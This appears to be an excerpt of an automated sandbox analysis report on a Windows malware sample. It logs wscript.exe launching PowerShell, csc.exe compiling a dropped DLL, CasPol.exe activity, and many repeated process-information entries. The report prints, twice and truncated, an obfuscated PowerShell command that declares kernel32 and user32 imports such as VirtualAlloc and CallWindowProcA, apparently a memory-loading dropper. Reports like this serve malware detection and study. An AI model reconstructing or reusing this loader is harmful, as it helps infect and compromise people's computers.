            Source: Binary string: l8C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.pdb source: powershell.exe, 00000006.00000002.86750406025.0000000004961000.00000004.00000800.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000006.00000002.86815709366.0000000009330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000000.86571566419.0000000001100000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEn
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEnJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07B45708 push C34C07A2h; ret 6_2_07B45716
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07B45640 push C34C07A2h; ret 6_2_07B45716
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_010E3CD8 push cs; retf 5356h12_2_010E3D4F
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_0111B492 push 84DC2881h; retf 12_2_0111B497
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.cmdline
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.cmdlineJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.dllJump to dropped file
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
